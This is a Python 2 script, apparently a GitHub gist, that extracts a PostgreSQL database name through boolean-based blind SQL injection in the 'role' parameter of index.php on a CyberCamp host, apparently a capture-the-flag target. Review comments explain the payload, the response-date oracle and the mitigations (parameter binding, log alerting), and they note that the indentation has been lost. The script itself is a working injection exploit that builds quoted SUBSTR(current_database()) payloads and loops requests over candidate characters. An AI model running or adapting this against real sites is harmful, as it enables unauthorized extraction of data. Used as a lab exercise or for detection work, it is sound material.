@tunelko
Created November 5, 2016 11:21
#!/usr/bin/env python
import requests
import urllib
import base64
import string
import sys
# Boolean-based blind SQL injection probe against the `role` query parameter of
# index.php on a CyberCamp host (the hostname suggests a deliberately
# vulnerable exercise target -- TODO confirm). It recovers the value returned
# by current_database() one character at a time.
# NOTE(review): indentation was lost when this page was captured; the nesting
# is presumably `for i` > `for tried` > `if` -- confirm against the original.
# NOTE(review): Python 2 only (print statements, string.uppercase/lowercase).
url='https://webvulnerable07.cybercamp.es:8507/index.php'
# Candidate alphabet: A-Z, a-z, 0-9 and the two braces (64 characters).
# str(digits) is a no-op here: string.digits is already a str.
alpha=string.uppercase+string.lowercase
digits=string.digits
testchars=alpha+str(digits)+'{'+'}'
# Prefix of the database name confirmed so far.
dbstring=''
pos=0
# Empty cookie dict: the requests below carry no session cookie.
cookies={}
# range(14) caps the recovered name at 14 characters; pos is the 1-based
# prefix length compared on each pass.
for i in range(14):
pos = i + 1;
for tried in testchars:
# The value closes the string literal the application presumably builds around
# `role`, then ANDs in a comparison between the first `pos` characters of
# current_database() (a PostgreSQL function) and the known prefix plus the
# candidate. The trailing quote is left open, presumably to be closed by the
# application's own query text. Nothing here percent-encodes the value.
# Defender's view: this only works if `role` reaches the SQL text unescaped;
# binding it as a query parameter, or validating it against a fixed list of
# role names, removes the injection point.
urlvuln= url + "?role=admin' AND (SELECT SUBSTR((SELECT current_database()),1,%s))='%s" % (pos, dbstring+tried)
r = requests.get(urlvuln,cookies=cookies)
print urlvuln
# Oracle: the literal '2016-06-12' is present in the response body when the
# injected condition holds -- presumably a date on content that is only
# rendered when the query matches a row (verify against the application).
if '2016-06-12' in r.content:
print 'FOUND' + tried
dbstring += tried
print dbstring
# There is no break after a hit, so with the presumed nesting a full run sends
# 14 * 64 = 896 GETs. In access logs that is a burst of index.php requests from
# one client whose `role` values contain a quote, SELECT, SUBSTR and
# current_database -- a pattern worth alerting on and rate-limiting.